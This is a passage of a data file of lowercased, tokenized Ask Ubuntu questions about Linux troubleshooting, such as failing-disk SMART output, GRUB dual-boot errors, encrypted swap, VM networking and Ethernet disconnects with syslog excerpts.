0x0032 100 100 000 old_age always - 149 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 220 disk_shift 0x0002 100 100 000 old_age always - 143 222 loaded_hours 0x0032 086 086 000 old_age always - 5667 223 load_retry_count 0x0032 100 100 000 old_age always - 0 224 load_friction 0x0022 100 100 000 old_age always - 0 226 load-in_time 0x0026 100 100 000 old_age always - 338 240 head_flying_hours 0x0001 100 100 001 pre-fail offline - 0 smart error log version : 1 ata error count : 6226 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 6226 occurred at disk power-on lifetime : 8804 hours ( 366 days + 20 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 04 11 ff 11 08 90 e0 error : abrt 255 sectors at lba = 0x00900811 = 9439249 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 35 00 00 10 08 90 e0 00 00:09:43.440 write dma ext 35 00 00 10 14 8c e0 00 00:09:43.436 write dma ext 35 00 00 10 10 8c e0 00 00:09:43.431 write dma ext 35 00 00 10 0c 8c e0 00 00:09:43.426 write dma ext 35 00 00 10 08 8c e0 00 00:09:43.404 write dma ext error 6225 occurred at disk power-on lifetime : 8804 hours ( 366 days + 20 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 04 11 ff 11 08 88 e0 error : abrt 255 sectors at lba = 0x00880811 = 8914961 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 35 00 00 10 08 88 e0 00 00:09:36.808 write dma ext 35 00 00 10 14 84 e0 00 00:09:36.804 write dma ext 35 00 00 10 10 84 e0 00 00:09:36.781 write dma ext 35 00 00 10 08 08 e0 00 00:09:36.748 write dma ext 35 00 00 10 14 04 e0 00 00:09:36.743 write dma ext error 6224 occurred at disk power-on lifetime : 8804 hours ( 366 days + 20 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 04 11 ff 11 0c 04 e0 error : abrt 255 sectors at lba = 0x00040c11 = 265233 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 35 00 00 10 0c 04 e0 00 00:09:31.808 write dma ext 35 00 00 10 0c 84 e0 00 00:09:31.803 write dma ext 35 00 00 10 08 84 e0 00 00:09:31.765 write dma ext 35 00 f8 18 14 80 e0 00 00:09:31.759 write dma ext 25 00 08 68 53 1c e0 00 00:09:31.740 read dma ext error 6223 occurred at disk power-on lifetime : 8804 hours ( 366 days + 20 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 04 11 ff 11 08 f0 e0 error : abrt 255 sectors at lba = 0x00f00811 = 15730705 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 35 00 00 10 08 f0 e0 00 00:09:25.101 write dma ext 35 00 00 10 14 ec e0 00 00:09:25.096 write dma ext 35 00 00 10 10 ec e0 00 00:09:25.091 write dma ext 35 00 00 10 0c ec e0 00 00:09:25.087 write dma ext 35 00 00 10 08 ec e0 00 00:09:25.029 write dma ext error 6222 occurred at disk power-on lifetime : 8804 hours ( 366 days + 20 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 04 11 ff 11 08 e8 e0 error : abrt 255 sectors at lba = 0x00e80811 = 15206417 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 35 00 00 10 08 e8 e0 00 00:09:16.662 write dma ext 35 00 00 10 14 e4 e0 00 00:09:16.658 write dma ext 35 00 00 10 10 e4 e0 00 00:09:16.653 write dma ext 35 00 00 10 0c e4 e0 00 00:09:16.649 write dma ext 35 00 00 10 08 e4 e0 00 00:09:16.605 write dma ext smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . from there it seems that there is something wrong ... 5 reallocated_sector_ct 0x0033 075 075 050 pre-fail always - 1898 196 reallocated_event_count 0x0032 100 100 000 old_age always - 140 197 current_pending_sector 0x0032 100 100 000 old_age always - 149
224349	how to learn linux ?	what is the best way to learn linux ? is there a scheduled book or a site for looking regularly ? i am a beginner and want to learn ( finally transfer everything to linux ) all a user need : ) for being more specific there are lots of sources on web but also there are lots of things to learn to learn sth : ) and that means lots of time . i am open to all kind of advice . thanks
224352	ubuntu 12.04 booting error	i have ubuntu 12.04 downloaded along side my windows 7 sony viao laptop , ive used it for a couple of months , yesterday i decided to boot onto windows then it did something that messed up ubuntu . when ever i select ubuntu in the selection where there is ubuntu and windows , when ever i select it it gives me this error minimal bash-like line editing is supported for the first word , tab list possible command completion anywhere else . tab list possible device or file completions grub > now i have a usb which has ubuntu 12.04 on it i booted on it to use the boot-repair application that was supposed to re-install grub but it didnt work this is the link that has info on my partition http : //paste.ubuntu.com/1402575/ further more it seems like ubuntu/linux is not listed as one of the partitions device boot start end blocks id system /dev/sda1 2048 38791167 19394560 27 hidden ntfs winre /dev/sda2 * 38791168 39507967 358400 7 hpfs/ntfs/exfat /dev/sda3 39507968 1250261679 605376856 7 hpfs/ntfs/exfat so ; i have a ubuntu installed on my hard drive i try to boot ubuntu and it doesnt work i tried using boot-repair application from my usb-drive and it didnt work how do i go on about fixing this problem of mine ? many thanks
224353	error while trying to dual boot ubuntu alongside windows 8	i recently purchased a new toshiba ultrabook that comes pre-installed with windows 8 . i 'm trying to dual boot 12.10 with it and i have run into a problem with the installer . when i get to the page to pick the partitions i get this : no drives are listed and the only thing in that device drop down is /dev/sda . if i click install now or +/-/change i get an `` ubuntu has stopped working '' error message . i 'm trying to install off a 12.10 64-bit usb drive in uefi mode , and i have tried it with secure boot both enabled and disabled with the same results . the hard drive set up is as follows : 500 gb main drive windows recovery ( primary ) efi boot section ( primary ) windows ' partion ( 280 gb i believe ) ( primary ) unallocated space i created for ubuntu partition ( 200ish gb ) another windows recovery partition ( primary ) 12 gb solid state drive all unallocated space could it be a problem with the number of primary partitions ? i think i read somewhere about a max of 4 .
224356	what is the default call of keyboard shortcuts in gnome ?	i am trying to find what is being called when i press a keyboard shortcut . for example , if i hit ctrl + alt + l i block the screen , or when i hit the `` mute '' key in my keyboard i mute the sound . i ca n't find where those bindings are stored . i have found the list of bindings in /usr/share/gnome-control-center/keybindings , but i do n't see there the effect of the key , just that it is a shortcut . i am not looking for the window where the shortcuts are listed ( 1 ) but i want what the shortcuts are calling . for example , if i create a new shortcut , which executes a shell script , it 's easy to see what it is calling , just clicking on the name ( in the said window 1 ) , but if it 's a default shortcut , clicking on the name disables the shortcut , so i want to know what the shortcut executes when it 's activated . i 'm using gnome shell ( not unity ) in ubuntu 12.04
224362	do symlinks from hdd to ssd give a performance hit ?	i am planning to install kubuntu onto an ssd , but have /home mounted on a hard disk drive . but also , i would like some /home/ ... subdirectories to benefit from ssd 's performance ( they will be read often and written rarely ) . an obvious solution for this is to create symbolic links to some location on the solid-state drive . however , i was under the impression that symlinks are similar to files in a way , and to get to the files on the ssd , the computer would have to read the symlink from the hdd first . so my question is the following : do symbolic links from a ( normal ) hard disk drive to a solid-state drive ( both ext4 formatted ) lead to a significant performance hit ? can i just use them or should i look for another solution ?
224369	cryptswap boot error - ca n't mount ?	i believe i have my swap set up but am not sure because on start up it says that it is something along the lines of `` could not mount /dev/mapper/cryptswap1 m for manual s for skip '' . but it appears to be mounted ? i have already tried this solution with no success . when i run free -m the output is : total used free shared buffers cached mem : 3887 769 3117 0 54 348 -/+ buffers/cache : 366 3520 swap : 4026 0 4026 and sudo bklid is : /dev/sda1 : uuid= '' 9fb3ccd6-3732-4989-bfa4-e943a09f1153 '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' bd9fe154-8621-48b3-95d2-ae5c91f373fd '' type= '' swap '' and cat /etc/crypttab is : cryptswap1 /dev/sda5 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 my /etc/fstab is : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=9fb3ccd6-3732-4989-bfa4-e943a09f1153 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation # uuid=bb0e378e-8742-435a-beda-ae7788a7c1b0 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 cat /proc/swaps output is : filename type size used priority /dev/dm-0 partition 4123644 0 -1 is my swap not setup correctly or how can i fix my boot message ?
224371	dual boot 10.04 and windows 7	before downvote , please this is not a duplicate i read the related questions and could n't solve my problem . i bought a new laptop that originally had win8 installed , i formatted it , installed windows 7 and then went to install ubuntu . that did n't work because no ubuntu version whatsoever ( 10.04 , 11.04 or 12.04 ) were able to even detect partitions on my harddisk . so i decided to go the other way , install ubuntu then try installing windows and fix grup after it gets broken due to installing windows . using gparted , i created an ntfs partition and then rebooted and tried installing windows 7 . that failed , the error message was speaking about gpt table . i am trying to just understand what 's going on here , why am i unable to do what i was perfectly doing on my old machine ( please in enough detail ; let me know if i need to provide more information ) ? and how can i fix this ? i am trying to avoid using wubi so if there 's any other way , i 'd take it . currently running on ubuntu if i need to use some tool to extract more information about my hdd edit : thanks , fabricator4 . i indeed used gparted to delete my partioning table and msdos table worked just fine ( my hdd 's size is 500 gbs only ) . i did consider installing 12.04 , the thing works just fine on live cd and when i ran the installer it recognized windows partitions and all ; i made a partition for it and installed . once i reboot and choose at the grub screen ubuntu , the screen goes off ( totally off ) , then on again and kinda blinking ; i hear the welcome music of ubuntu but i can not see anything , except a very very thin line at the top of my screen where i can see the mouse . it 's weird , it did work on live cd just fine , why is it crashing when it 's installed ? could be a graphics card problem ? is there a way to fix such a thing ? p.s while the system is booting , i do not see the ubuntu mark and the dots going to indicate it 's loading , i have a blinking screen instead .
224379	global menu in ubuntu 12.04 is not working untill after using a program once ?	i am useing ubuntu 12.04 and the global menu is not working untill after i have used any program or the dashboard at least once . i was wondering if any one knew anything about this and if there was a way to fix it . however the menu seems to work fine after useing a program or the dash but it is just anoying to be forced to open something you dont need to in order to do something else . any help will be appreciated .
224384	problems in adobe flash player for firefox	is there a version of flash that doesnt crash or freeze my computer ? if there is n't anything like that , is there any other software that works like flash and works on things that require flash ( like videos online ) but has less glitches , or a software that keeps flash stable and less problematic ? if so , please let me know with an answer . btw , i was wondering if gnash is helpful at all ?
224391	unable to ssh into ubuntu vm running w/ a nat ip address even w/ openssh-server installed	this is a fresh install of ubuntu server 12.10 running virtulbox 4.8.2 on a kubuntu 12.10 host . i have ubuntu server running w/ a nat'ed ip address ( 10.0.2.x or something like that ) . i want to ssh from my kubuntu laptop to my vbox server so during install i selected openssl server or whatever the option is . outside of that selection there is nothing custom done and the system is completely up to date . so when i try to ssh to that device i get a timeout response and am unable to connect . the service is running on my vm but nothing happens . i also can not ping the vm either . is there something i 'm missing ? a firewall between my vm and host ? not quite sure thanks for the help in advance , jonathan
224392	how to allow remote connections to flask ?	inside the system , running on virtual machine , i can access the running server at 127.0.0.1:5000 . although the 'remote ' address of the vm is 192.168.56.101 ( ping and ssh work fine ) , i can not access the server with 192.168.50.101:5000 neither from the virtual machine nor from the local one . i guess there 's something preventing remote connections . here 's /etc/network/interfaces : auto eth1 iface eth1 inet static address 192.168.56.101 netmask 255.255.255.0 ufw is inactive . how do i fix this problem ?
224395	unable to show correctly symbolic icons with appindicator	i 'm creating an app under ubuntu 12.04 and using libappindicator and vala . i want to use a symbolic icon , to ensure that the colors are adapted to the background in the status bar . unfortunately , i 'm unable to make it work . i installed my icons ( which uses the bebebe key color ) and they are shown , but the color is bebebe , not white or black like the other icons . i also tried to put an icon that i was sure to be symbolic ( audio-volume-high-symbolic ) but , again , it 's shown with the original colors , instead of them being replaced by the current fg color . i used both set_icon and set_icon_full methods , but none of them worked : (
224399	run fstrim from livecd	a few years ago i installed ubuntu 10.04 with lvm + luks on a system with ssd , trim was not enabled . now i want to install ubuntu 12.04 on the same ssd . i have found a guide explaining how to enable trim on ubuntu 12.04 with lvm + luks , but before installing the new system , i want to clean out all the `` marked for deletion '' data generated under ubuntu 10.04 , to make the disk fast as new . my plan is to boot a ubuntu 12.04 livecd and create a new ext4 filesystem on the ssd , then mount the filesystem and run fstrim on it . after rebooting the livecd i will install the system as normal , and enable trim . can anybody say if this will work ?
224400	unity clock missing	i recently installed ubuntu 12.10 and it seems as though my clock is missing . i also do n't see any options for date/time in the system settings panel . am i missing something ? again this is with unity .
224403	frequent disconnects ubuntu desktop 12.10 x64 intel 82579v e1000e	i 'm having frequent disconnects with my new install of ubuntu 12.10 . i tried updating the kernel driver to the latest intel release to no avail . my expertise is spent . it happens anywhere between 1 min and 10 min . any ideas ? syslog : dec 1 13:51:39 andromeda kernel : [ 972.188809 ] audit_printk_skb : 6 callbacks suppressed dec 1 13:51:39 andromeda kernel : [ 972.188813 ] type=1701 audit ( 1354398699.418:199 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=6039 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f26777d9205 code=0x50000 dec 1 13:51:39 andromeda kernel : [ 972.188817 ] type=1701 audit ( 1354398699.418:200 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=6039 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f26777d9205 code=0x50000 dec 1 13:51:39 andromeda kernel : [ 972.188820 ] type=1701 audit ( 1354398699.418:201 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=6039 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f26777d9205 code=0x50000 dec 1 13:51:39 andromeda kernel : [ 972.188823 ] type=1701 audit ( 1354398699.418:202 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=6039 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f26777d9205 code=0x50000 dec 1 13:51:39 andromeda kernel : [ 972.188825 ] type=1701 audit ( 1354398699.418:203 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=6039 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f26777d9205 code=0x50000 dec 1 13:51:39 andromeda kernel : [ 972.331419 ] type=1701 audit ( 1354398699.558:204 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=6039 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=2 compat=0 ip=0x7f26777d96b0 code=0x50000 dec 1 13:53:12 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : carrier now off ( device state 100 , deferring action for 4 seconds ) dec 1 13:53:12 andromeda kernel : [ 1064.894387 ] e1000e : e1000e : eth0 nic link is down dec 1 13:53:16 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : activated - > unavailable ( reason 'carrier-changed ' ) [ 100 20 40 ] dec 1 13:53:16 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : deactivating device ( reason 'carrier-changed ' ) [ 40 ] dec 1 13:53:16 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 5946 dec 1 13:53:16 andromeda avahi-daemon [ 890 ] : withdrawing address record for fe80 : :ea40 : f2ff : fee2:4d86 on eth0 . dec 1 13:53:16 andromeda avahi-daemon [ 890 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :ea40 : f2ff : fee2:4d86 . dec 1 13:53:16 andromeda avahi-daemon [ 890 ] : interface eth0.ipv6 no longer relevant for mdns . dec 1 13:53:16 andromeda kernel : [ 1069.025288 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready dec 1 13:53:16 andromeda avahi-daemon [ 890 ] : withdrawing address record for 192.168.11.17 on eth0 . dec 1 13:53:16 andromeda avahi-daemon [ 890 ] : leaving mdns multicast group on interface eth0.ipv4 with address 192.168.11.17 . dec 1 13:53:16 andromeda avahi-daemon [ 890 ] : interface eth0.ipv4 no longer relevant for mdns . dec 1 13:53:16 andromeda networkmanager [ 1115 ] : < warn > dns : plugin dnsmasq update failed dec 1 13:53:16 andromeda networkmanager [ 1115 ] : < info > ( ( null ) ) : removing resolv.conf from /sbin/resolvconf dec 1 13:53:16 andromeda dnsmasq [ 1907 ] : setting upstream servers from dbus dec 1 13:53:16 andromeda dbus [ 800 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) dec 1 13:53:16 andromeda dbus [ 800 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : carrier now on ( device state 20 ) dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : unavailable - > disconnected ( reason 'carrier-changed ' ) [ 20 30 40 ] dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > auto-activating connection '82579v ' . dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) starting connection '82579v' dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) dec 1 13:53:32 andromeda kernel : [ 1084.938042 ] e1000e : e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx dec 1 13:53:32 andromeda kernel : [ 1084.938049 ] e1000e 0000:00:19.0 : eth0 : 10/100 speed : disabling tso dec 1 13:53:32 andromeda kernel : [ 1084.938815 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > dhclient started with pid 6080 dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . dec 1 13:53:32 andromeda dhclient : internet systems consortium dhcp client 4.2.4 dec 1 13:53:32 andromeda dhclient : copyright 2004-2012 internet systems consortium . dec 1 13:53:32 andromeda dhclient : all rights reserved . dec 1 13:53:32 andromeda dhclient : for info , please visit https : //www.isc.org/software/dhcp/ dec 1 13:53:32 andromeda dhclient : dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit dec 1 13:53:32 andromeda dhclient : listening on lpf/eth0/e8:40 : f2 : e2:4d:86 dec 1 13:53:32 andromeda dhclient : sending on lpf/eth0/e8:40 : f2 : e2:4d:86 dec 1 13:53:32 andromeda dhclient : sending on socket/fallback dec 1 13:53:32 andromeda dhclient : dhcprequest of 192.168.11.17 on eth0 to 255.255.255.255 port 67 dec 1 13:53:32 andromeda dhclient : dhcpack of 192.168.11.17 from 192.168.11.1 dec 1 13:53:32 andromeda dhclient : bound to 192.168.11.17 -- renewal in 33576 seconds . dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > address 192.168.11.17 dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > prefix 24 ( 255.255.255.0 ) dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > gateway 192.168.11.1 dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > hostname 'andromeda' dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > nameserver '192.168.11.1' dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > domain name 'hsd1.ca.comcast.net' dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... dec 1 13:53:32 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... dec 1 13:53:32 andromeda avahi-daemon [ 890 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.11.17 . dec 1 13:53:32 andromeda avahi-daemon [ 890 ] : new relevant interface eth0.ipv4 for mdns . dec 1 13:53:32 andromeda avahi-daemon [ 890 ] : registering new address record for 192.168.11.17 on eth0.ipv4 . dec 1 13:53:33 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] dec 1 13:53:33 andromeda networkmanager [ 1115 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf dec 1 13:53:33 andromeda dnsmasq [ 1907 ] : setting upstream servers from dbus dec 1 13:53:33 andromeda dnsmasq [ 1907 ] : using nameserver 192.168.11.1 # 53 dec 1 13:53:33 andromeda networkmanager [ 1115 ] : < info > policy set '82579v ' ( eth0 ) as default for ipv4 routing and dns . dec 1 13:53:33 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) successful , device activated . dec 1 13:53:33 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . dec 1 13:53:33 andromeda dbus [ 800 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) dec 1 13:53:33 andromeda dbus [ 800 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' dec 1 13:53:33 andromeda avahi-daemon [ 890 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :ea40 : f2ff : fee2:4d86 . dec 1 13:53:33 andromeda avahi-daemon [ 890 ] : new relevant interface eth0.ipv6 for mdns . dec 1 13:53:33 andromeda avahi-daemon [ 890 ] : registering new address record for fe80 : :ea40 : f2ff : fee2:4d86 on eth0.* . dec 1 13:53:41 andromeda ntpdate [ 6154 ] : adjust time server 91.189.94.4 offset 0.000928 sec dec 1 13:53:50 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : carrier now off ( device state 100 , deferring action for 4 seconds ) dec 1 13:53:50 andromeda kernel : [ 1102.980003 ] e1000e : e1000e : eth0 nic link is down dec 1 13:53:54 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : activated - > unavailable ( reason 'carrier-changed ' ) [ 100 20 40 ] dec 1 13:53:54 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : deactivating device ( reason 'carrier-changed ' ) [ 40 ] dec 1 13:53:54 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 6080 dec 1 13:53:54 andromeda avahi-daemon [ 890 ] : withdrawing address record for fe80 : :ea40 : f2ff : fee2:4d86 on eth0 . dec 1 13:53:54 andromeda avahi-daemon [ 890 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :ea40 : f2ff : fee2:4d86 . dec 1 13:53:54 andromeda avahi-daemon [ 890 ] : interface eth0.ipv6 no longer relevant for mdns . dec 1 13:53:54 andromeda avahi-daemon [ 890 ] : withdrawing address record for 192.168.11.17 on eth0 . dec 1 13:53:54 andromeda avahi-daemon [ 890 ] : leaving mdns multicast group on interface eth0.ipv4 with address 192.168.11.17 . dec 1 13:53:54 andromeda kernel : [ 1107.025959 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready dec 1 13:53:54 andromeda networkmanager [ 1115 ] : < warn > dns : plugin dnsmasq update failed dec 1 13:53:54 andromeda networkmanager [ 1115 ] : < info > ( ( null ) ) : removing resolv.conf from /sbin/resolvconf dec 1 13:53:54 andromeda avahi-daemon [ 890 ] : interface eth0.ipv4 no longer relevant for mdns . dec 1 13:53:54 andromeda dnsmasq [ 1907 ] : setting upstream servers from dbus dec 1 13:53:54 andromeda dbus [ 800 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) dec 1 13:53:54 andromeda dbus [ 800 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : carrier now on ( device state 20 ) dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : unavailable - > disconnected ( reason 'carrier-changed ' ) [ 20 30 40 ] dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > auto-activating connection '82579v ' . dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) starting connection '82579v' dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . dec 1 13:54:10 andromeda kernel : [ 1123.167668 ] e1000e : e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx dec 1 13:54:10 andromeda kernel : [ 1123.167675 ] e1000e 0000:00:19.0 : eth0 : 10/100 speed : disabling tso dec 1 13:54:10 andromeda kernel : [ 1123.168430 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > dhclient started with pid 6212 dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . dec 1 13:54:10 andromeda dhclient : internet systems consortium dhcp client 4.2.4 dec 1 13:54:10 andromeda dhclient : copyright 2004-2012 internet systems consortium . dec 1 13:54:10 andromeda dhclient : all rights reserved . dec 1 13:54:10 andromeda dhclient : for info , please visit https : //www.isc.org/software/dhcp/ dec 1 13:54:10 andromeda dhclient : dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : dhcpv4 state changed 